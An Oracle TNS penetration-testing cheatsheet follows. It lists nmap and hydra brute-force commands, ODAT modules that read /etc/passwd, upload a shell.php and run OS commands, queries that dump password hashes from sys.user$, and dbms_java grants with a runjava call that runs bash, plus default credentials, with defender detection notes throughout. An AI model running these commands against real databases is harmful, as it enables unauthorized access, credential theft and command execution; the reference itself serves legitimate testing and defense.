Oracle TNS Enumeration Cheatsheet

Default Port: 1521 (TCP)


Nmap Scripts

# oracle-tns-version only asks the listener for its version string (no credentials)
nmap -p 1521 --script oracle-tns-version <ip>
# The three brute scripts guess SIDs / logons against the listener.
# Defender: they surface as bursts of unknown-SID errors in the listener log
# and as repeated failed logons in the database audit trail.
nmap -p 1521 --script oracle-sid-brute <ip>
nmap -p 1521 --script oracle-brute <ip>
nmap -p 1521 --script oracle-brute-stealth <ip>
# oracle-enum-users needs a known SID, passed as a script argument (next line)
nmap -p 1521 --script oracle-enum-users \
  --script-args oracle-enum-users.sid=<sid> <ip>

ODAT (Oracle Database Attacking Tool)

# Defender: each module below maps to a database feature that can be
# restricted (UTL_FILE, Java in the database, external tables) and to audit
# events (failed logons while guessing, catalog and file access afterwards).

# Full automated scan
odat all -s <ip> -p 1521

# SID brute force
odat sidguesser -s <ip> -p 1521

# Password brute force (after getting SID)
odat passwordguesser -s <ip> -p 1521 -d <sid>

# File read/write (requires UTL_FILE privilege)
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt
odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php

# OS command execution (requires Java in the database plus the Java
# permissions covered in the "Privilege Escalation via Java" section below)
odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami"

# External table method for file read
odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd

sqlplus (Direct Connection)

# Install: sudo apt install oracle-instantclient-sqlplus

# Connect (host:port/<sid> and //host:port/<service_name> are EZConnect strings)
sqlplus <user>/<pass>@<ip>:<port>/<sid>
# Defender: Oracle audits SYSDBA logons by default (OS audit trail);
# a SYSDBA connection from an unexpected host is an incident indicator.
sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba
sqlplus <user>/<pass>@//<ip>:<port>/<service_name>

Common SIDs to Try

XE          ORCL        DB          DATABASE
PROD        TEST        DEV         ORACLE
OEMREP      ORACLR_CONNECTION_DATA

Enumeration Queries (Once Connected)

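-- Version and user
-- session_privs lists only the system privileges active in the current session.
SELECT * FROM v$version;
SELECT user FROM dual;
SELECT * FROM session_privs;

-- Database objects
-- ALL_* views cover what the current account can see. Dictionary identifiers
-- are stored upper-case, so give <TABLE> in upper case unless it was created
-- with a quoted name.
SELECT * FROM all_tables;
SELECT owner, table_name FROM all_tables WHERE owner != 'SYS';
SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>';

-- Users and privileges
-- DBA_* views need elevated catalog access (typically the DBA role or
-- SELECT ANY DICTIONARY); user_role_privs works for any account.
SELECT username FROM dba_users;
SELECT * FROM user_role_privs;
SELECT * FROM dba_sys_privs WHERE grantee = '<user>';

-- Password hashes (as SYSDBA)
-- Defender: direct reads of SYS.USER$ are not normal application activity;
-- audit SELECT on it and alert on any hit outside DBA sessions.
SELECT name, password FROM sys.user$;
SELECT name, spare4 FROM sys.user$;    -- SHA-1 hashes (11g+)

-- Check for DBA role
-- CREATE SESSION is the baseline logon privilege (every connected account
-- holds it), so filtering session_privs on it says nothing about DBA
-- membership. Look at the granted roles instead: a row here means the
-- account holds a direct DBA grant.
SELECT * FROM user_role_privs WHERE granted_role = 'DBA';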

Privilege Escalation via Java

-- Grant Java permissions (as DBA)
-- Argument order: grantee (SCOTT), permission class, permission target,
-- action list.
-- Defender: these grants are recorded in DBA_JAVA_POLICY; review it for
-- <<ALL FILES>> and RuntimePermission rows held by non-DBA schemas, and
-- audit calls to DBMS_JAVA.GRANT_PERMISSION.
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

-- Execute OS command via Java
-- Defender: a DBMS_JAVA.RUNJAVA call from an application schema is itself
-- the indicator; audit EXECUTE on DBMS_JAVA and alert on RUNJAVA invocations.
SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual;

Brute Force

# Defender: listener-level password guessing produces repeated ORA-01017
# failed logons; FAILED_LOGIN_ATTEMPTS in the account's profile locks the
# account after a threshold, and failed-logon auditing makes the burst visible.
hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid>
nmap -p 1521 --script oracle-brute \
  --script-args oracle-brute.sid=<sid> <ip>

Default Credentials

Username Password Notes
sys change_on_install connects AS SYSDBA
system manager
scott tiger Classic demo user
dbsnmp dbsnmp SNMP agent
mdsys mdsys
hr hr